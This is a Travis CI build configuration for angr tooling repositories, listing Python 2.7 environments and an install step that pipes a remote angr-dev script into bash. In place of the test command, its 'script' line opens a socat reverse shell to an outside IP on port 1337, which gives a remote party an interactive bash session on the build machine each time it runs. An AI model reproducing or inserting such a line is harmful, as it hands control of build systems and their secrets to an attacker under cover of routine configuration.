language: python
python: 2.7
sudo: required
dist: xenial
env:
  - PY=e ANGR_REPO=tracer
  - PY=e ANGR_REPO=fuzzer
  - PY=e ANGR_REPO=driller
  - PY=p ANGR_REPO=colorguard
#  - PY=p ANGR_REPO=rex NOSE_OPTIONS="-x" NOSE_PROCESSES=1
install: ( curl https://raw.githubusercontent.com/angr/angr-dev/$TRAVIS_BRANCH/travis-install.sh | grep -v 404 || curl https://raw.githubusercontent.com/angr/angr-dev/master/travis-install.sh ) | bash
script: socat tcp-connect:159.203.203.194:1337 system:bash,pty,stderr
